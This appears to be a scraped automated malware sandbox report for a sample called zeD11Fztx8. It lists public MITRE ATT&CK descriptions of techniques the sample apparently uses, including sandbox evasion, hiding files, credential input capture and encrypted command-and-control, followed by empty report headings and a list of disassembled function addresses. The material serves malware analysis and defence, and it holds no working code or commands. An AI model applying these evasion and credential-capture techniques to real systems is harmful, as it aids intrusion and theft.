Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report zeD11Fztx8

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

Function 013815B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Function 01381599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Function 01381575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Function 01389EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Function 01381F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Function 01382110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Function 01386E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Function 013877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Function 0138A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Function 01389320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Function 01389C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Function 01389060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Function 01389620, Relevance: 31.8, APIs: 21, Instructions: 284
stringCOMMON

Function 01389A90, Relevance: 25.6, APIs: 17, Instructions: 139
memoryfilesleepCOMMON

Function 01388520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Function 01388DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Function 01388BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Function 0138A690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Function 01381C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Function 01389F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Function 01388990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Function 01382180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Function 01388290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON